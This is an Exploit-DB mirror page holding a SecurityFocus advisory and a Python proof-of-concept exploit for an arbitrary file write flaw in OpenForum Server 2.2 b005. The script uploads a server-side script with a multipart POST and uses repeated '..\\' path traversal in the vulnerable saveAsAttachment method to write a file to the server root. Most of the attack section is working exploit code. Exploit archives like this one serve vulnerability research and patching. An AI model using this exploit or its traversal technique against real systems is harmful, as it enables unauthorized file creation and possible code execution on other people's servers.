bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/34035.sjs
Offensive Security 6d75764f0a Updated 07_13_2014
2014-07-13 04:39:14 +00:00

92 lines
6.1 KiB
JavaScript
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/40364/info
OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Arbitrary File Write #
# Software.................Open Forum Server 2.2 b005 #
# Download.................http://code.google.com/p/open-forum #
# Date.....................5/23/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be #
# exploited to write to the local file system of the server. #
# #
# #
# ##Exploit## #
# #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. #
# #
# #
# ##Proof of Concept## #
# #
import sys, socket
host = 'localhost'
port = 80
def send_request(request):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(32) # sometimes it takes a while
s.connect((host, port))
s.send(request)
response = s.recv(8192) + s.recv(8192) # a hack within a hack
return response
def write_file():
try:
content = '----x--\r\n'\
'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
'Content-Type: application/octet-stream\r\n\r\n'\
'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
'data = "hello, world";\r\n'\
'user = transaction.getUser();\r\n'\
'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
'transaction.sendPage("File Written");\r\n\r\n'\
'----x----\r\n'
response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Content-Type: multipart/form-data; boundary=--x--\r\n'
'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)
if 'HTTP/1.1 302 Redirect' not in response:
print 'Error writing get.sjs'
return
else: print 'get.sjs created'
response = send_request('GET OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
if 'File Written' not in response:
print 'Error writing to root'
return
else: print 'x.txt created in root'
except Exception:
print sys.exc_info()
write_file()
Reference in a new issue View git blame Copy permalink